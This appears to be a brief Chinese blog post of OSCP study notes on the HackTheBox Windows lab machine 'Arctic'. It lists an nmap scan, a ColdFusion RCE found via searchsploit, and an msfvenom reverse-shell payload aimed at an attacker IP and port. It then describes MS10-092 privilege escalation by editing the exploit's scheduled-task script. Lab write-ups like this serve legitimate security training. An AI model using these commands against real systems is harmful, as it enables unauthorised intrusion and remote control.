OSCP备考_0x43_HackThBox靶机_Windows_arctic

Ethan医生7个月前 (07-10)靶场220

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)

searchsploit ADOBE COLDFUSION

查找看看有没有exp

发现一个RCE 测试看看

然后反弹SHELL

提全使用ms10 092

将文件下载下来

同时创建一个反弹shell'

msfvenom -p windows/x64/shellreversetcp LHOST=10.10.16.43 LPORT=7777 -f exe >priv.exe

将这两个都上传到靶机

对了，在上传之前，要修改wsf

将原来的月改为minute ，同时tr后面的跟的定时任务也要指定到咱们priv。exe的路径

回到cmd下

cscript CVE-2010-3338.wsf

标签: OSCP

返回列表

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)绑定域名 http://10.129.48.103...

OSCP备考_0x45_HackThBox靶机_Windows_ bountynmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.246.227&nb...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.21.112 (扫描TCP)nmap -sU --top-ports 100 ...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.243.247 (扫描TCP)http://10.129.243.247/home.ph...

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

名称说明靶机下载链接https://www.vulnhub.com/entry/imf-1,162/攻击机（kali）ip：192.168.233.168靶机（CentOS）ip：192.168.23...

EthanDoctor